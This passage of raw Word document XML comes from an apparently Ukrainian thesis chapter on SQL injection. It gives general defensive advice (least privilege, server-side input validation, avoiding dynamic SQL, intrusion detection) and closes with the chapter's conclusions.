          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ажливо створити обліковий запис з меншими привілеями спершу, і починати надавати дозволи лише коли це необхідно. Перевагою для вирішення проблеми безпеки на початку є те, що вона дозволяє розробникам вирішувати проблеми безпеки, оскільки вони додають функції, так що ідентифікація і виправлення стають легшими. Додатково, розробники стають знайомими з фреймворками безпеки коли змушені дотримуватися його продовж всього проекту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A9B45" w14:textId="71FD3D6B" w:rsidR="007A61FB" w:rsidRDefault="007A61FB" w:rsidP="007A61FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Реалізації узгодженого стандарту кодування</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Розробники баз даних повинні обережно планувати безпеку всієї інфраструктури інформаційної системи, і інтегрувати безпечне рішення в свою розробку. Вони повинні також дотримуватися встановлення документованих стандартів і політик поки проектують, розробляють і реалізовують базу даних і додаток.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для прикладу, політика виконання доступу до даних. Загалом, розробники використовують будь-який спосіб доступу до даних, який їм подобається. Це, як правило, призводить до безлічі методів доступу до даних, кожен виявляє унікальну проблему безпеки. Більш обережна політика полягає в тому, щоб керувати принципами, які гарантують схожість в кожній роботі розробника. Це послідовно суттєво покращить як виправлення помилок, так і безпеку продукту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2A37EC" w14:textId="3F2D2CF2" w:rsidR="007A61FB" w:rsidRDefault="007A61FB" w:rsidP="007A61FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ще одною корисною політикою кодування є перевірка вхідних даних на клієнті і сервері. Розробники інколи покладаються лише на клієнтську сторону для уникнення проблем продуктивності, оскільки це мінімізує зворотній шлях до сервера. Однак, не слід вважати, що браузер дійсно відповідає стандартній перевірці, коли користувачі публікують інформацію. Всі перевірки вхідних даних повинні також відбуватись і на сервері, щоб будь-який зловмисний користувальницький ввід був правильно відфільтрований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43220F57" w14:textId="21C279D6" w:rsidR="007A61FB" w:rsidRDefault="007A61FB" w:rsidP="007A61FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Замість повідомлень про помилку за замовчуванням, які розкривають системну інформацію, користувачеві, коли виникає помилка, відображатимуться користувальницькі повідомлення про помилки, які надають мало або взагалі не відображають деталі системи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8BA25" w14:textId="77398157" w:rsidR="007A61FB" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Щоб захиститись від SQL ін’єкцій, розробникам необхідно належним чином доглядати за налаштуванням і розробкою додатку, щоб він був надійним і безпечним. Розробники повинні використовувати кращі практики і контрзаходи, щоб запобігти вразливості додатку до SQL ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3F302" w14:textId="6901BA31" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Контрзаходи:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6EAF34" w14:textId="77777777" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Перевіряти вміст строкових змінних і приймати тільки очікувані значення;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A441BB4" w14:textId="77777777" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>відхиляти записи, що містять двійкові дані, керуючі послідовності і символ коментарів;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7C2F9" w14:textId="77777777" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ніколи не будувати операції Transact-SQL безпосередньо з вводу користувача та використовувати збережені процедури для перевірки введення користувача</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432FAA97" w14:textId="77777777" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>реалізувати кілька рівнів перевірки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B03E6C" w14:textId="77777777" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>уникати побудови динамічного SQL з конкатенацією вхідних значень</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257675E" w14:textId="77777777" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>переконатися, що файли веб-конфігурації для кожної програми не містять конфіденційної інформації</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25221D" w14:textId="77777777" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>використовувати найбільш обмежувальний тип облікового запису SQL для програми</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219AAFBF" w14:textId="77777777" w:rsidR="002A4B1F" w:rsidRPr="002A4B1F" w:rsidRDefault="002A4B1F" w:rsidP="002A4B1F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Використовувати </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Intrusion</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для моніторингу ін’єкційних атак;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A05D09" w14:textId="3FD476F9" w:rsidR="004B547E" w:rsidRDefault="002A4B1F" w:rsidP="0019135A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4B1F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>тримати ненадійні дані окремо від команд і запитів</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E51662" w14:textId="77777777" w:rsidR="004B547E" w:rsidRPr="004B547E" w:rsidRDefault="004B547E" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:after="160"/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073AB07C" w14:textId="650354ED" w:rsidR="00A419FD" w:rsidRPr="00C0553F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc516752154"/>
      <w:bookmarkStart w:id="108" w:name="_Toc30433147"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="002A4B1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Висновки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о розділу</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="71912F14" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00FF414B" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6E5F32" w14:textId="3ED0FF01" w:rsidR="002425F2" w:rsidRDefault="00A419FD" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> є найбільш поширеною вразливістю веб сайтів в інтернеті, що використовує невдалі вхідні дані для передачі SQL команд через веб додаток для виконання на сервері бази даних. Загроза </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> включає обхід автентифікації, розкриття інформації, і компрометації цілісності і доступності даних. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> широко класифікуються як </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на основі помилок) і </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (введення всліпу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">). Адміністраторам баз даних і розробникам веб додатків необхідно слідувати методології підходу для виявлення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в веб інфраструктурі, що включає ручне тестування, тестування функцій, і фюззінг</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6438C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fuzzing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">). Основні контрзаходи для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> включають перевірка вхідних даних, відключення повідомлень про помилки або налаштування, правильне управління доступу до бази даних, і ізоляція бази даних від ОС.</w:t>
      </w:r>
      <w:r w:rsidR="002425F2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E26C7" w14:textId="49EF4148" w:rsidR="002425F2" w:rsidRDefault="002425F2" w:rsidP="002425F2">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
